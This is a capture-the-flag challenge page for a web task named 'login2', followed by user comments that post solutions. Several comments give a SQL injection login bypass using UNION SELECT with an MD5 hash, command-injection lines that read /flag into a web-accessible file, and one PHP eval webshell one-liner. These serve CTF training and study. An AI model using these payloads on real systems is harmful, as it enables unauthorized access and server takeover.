login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2462
提  示: 命令执行
描  述:
login2
评论
5883120xly 2月前

username= ' UNION SELECT '任意用户名', 'fae0b27c451c728867a567e8c1bb4e53' -- password=666 进入命令执行界面输入 666 | cat /flag >2.txt 访问http://117.72.52.127:14324/2.txt即可

回复 0

你文博哥哥 4月前

首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可

回复 0

一个姓⎝李⎠的师傅~ 4月前

做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77

回复 3

꧁༺༽༾ཊCCཏ༿༼༻꧂ 4月前

没难度

回复 1

六分之杰 4月前

https://zhuanlan.zhihu.com/p/7343164566

回复 0

D调丶Slayer 4月前

https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501

回复 0

19957910119 5月前

1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php

回复 0

ctfer-pls 5月前

看了评论厉害了

回复 0

ilovevicky99 6月前

用反弹shell的方法,为什么没有回显呀

回复 0

zhuizhui 6月前

' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test

回复 0

WriteUp

image
harry

6 金币

评分(9)

解题动态

20230302241 攻破了该题 2小时前
严晓颖 攻破了该题 5小时前
陆美宏 攻破了该题 5小时前
卢思杏 攻破了该题 5小时前
莫泽明 攻破了该题 5小时前
黎悦依 攻破了该题 6小时前
05su 攻破了该题 7小时前
木秀于林 攻破了该题 7小时前
AioKT 攻破了该题 1天前
WindZQ 攻破了该题 1天前
覃晴韵 攻破了该题 1天前
李心渝 攻破了该题 1天前
张立美 攻破了该题 1天前
特仑苏 攻破了该题 1天前
黄萌 攻破了该题 1天前
凌晨两点半 攻破了该题 1天前
党玉新 攻破了该题 1天前
半路出家 攻破了该题 1天前
叶子璐 攻破了该题 1天前
潘福演 攻破了该题 1天前
问题反馈